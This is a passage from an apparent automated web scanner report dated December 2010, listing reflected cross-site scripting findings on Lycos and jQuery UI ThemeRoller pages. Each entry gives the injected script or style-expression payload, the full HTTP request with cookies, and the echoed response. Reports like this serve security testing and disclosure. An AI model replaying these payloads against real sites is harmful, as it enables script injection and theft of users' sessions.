P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images9c59d"><script>alert(1)</script>b1e138b458a&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.53. http://info.lycos.com/ [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a4a7"><script>alert(1)</script>abc7cf3bcbf was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi5a4a7"><script>alert(1)</script>abc7cf3bcbf&cat=images HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:04 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multi5a4a7"><script>alert(1)</script>abc7cf3bcbf&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.54. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 327d3"><script>alert(1)</script>739d92ba30c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tos.php/327d3"><script>alert(1)</script>739d92ba30c HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163891850882

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 91442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<a href="/tos.php/327d3"><script>alert(1)</script>739d92ba30c#acceptance">
...[SNIP]...

1.55. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ade7"style%3d"x%3aexpression(alert(1))"6cec803882f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ade7"style="x:expression(alert(1))"6cec803882f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?2ade7"style%3d"x%3aexpression(alert(1))"6cec803882f=1 HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161724686; path=/
Date: Sun, 12 Dec 2010 14:34:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: LycosJobs=num82irdh4ljeo4nnvsi6bqqo5; expires=Sun, 12 Dec 2010 15:34:34 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/
Set-Cookie: diktfc=20F93AF4482D6F2C33F3F1B215794291BCD892461E6A; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.lycos.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/jobs/search?pn=2&amp;2ade7"style="x:expression(alert(1))"6cec803882f=1&amp;q=">
...[SNIP]...

1.56. http://jobs.lycos.com/search [x parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b25f3"style%3d"x%3aexpression(alert(1))"8e6083360e1 was submitted in the x parameter. This input was echoed as b25f3"style="x:expression(alert(1))"8e6083360e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?x=1b25f3"style%3d"x%3aexpression(alert(1))"8e6083360e1 HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161729042; path=/
Date: Sun, 12 Dec 2010 14:34:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: LycosJobs=4dq7os30hes5qg14m1sf1m0oc1; expires=Sun, 12 Dec 2010 15:34:36 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:36 GMT; path=/
Set-Cookie: diktfc=FA178DC2496B1980044763822ACABD48B570396C18E7; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.lycos.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/jobs/search?pn=2&amp;x=1b25f3"style="x:expression(alert(1))"8e6083360e1&amp;q=">
...[SNIP]...

1.57. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10fbb"><script>alert(1)</script>21f65dae1a0 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff10fbb"><script>alert(1)</script>21f65dae1a0&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff10fbb"><script>alert(1)</script>21f65dae1a0&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

1.58. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7317f"><script>alert(1)</script>b5f47834e30 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff7317f"><script>alert(1)</script>b5f47834e30&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff7317f"><script>alert(1)</script>b5f47834e30&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

1.59. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69061"><script>alert(1)</script>1a694a592e7 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e669061"><script>alert(1)</script>1a694a592e7&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e669061"><script>alert(1)</script>1a694a592e7&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

1.60. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c43"><script>alert(1)</script>a36a3b5f95c was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ece1c43"><script>alert(1)</script>a36a3b5f95c&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ece1c43"><script>alert(1)</script>a36a3b5f95c&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

1.61. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87fef"><script>alert(1)</script>4b472d7ef35 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc87fef"><script>alert(1)</script>4b472d7ef35&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc87fef"><script>alert(1)</script>4b472d7ef35&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

1.62. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac242"><script>alert(1)</script>71aa1498cfe was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9eeac242"><script>alert(1)</script>71aa1498cfe&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9eeac242"><script>alert(1)</script>71aa1498cfe&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

1.63. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64e26"><script>alert(1)</script>1a3124de35d was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada64e26"><script>alert(1)</script>1a3124de35d&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityO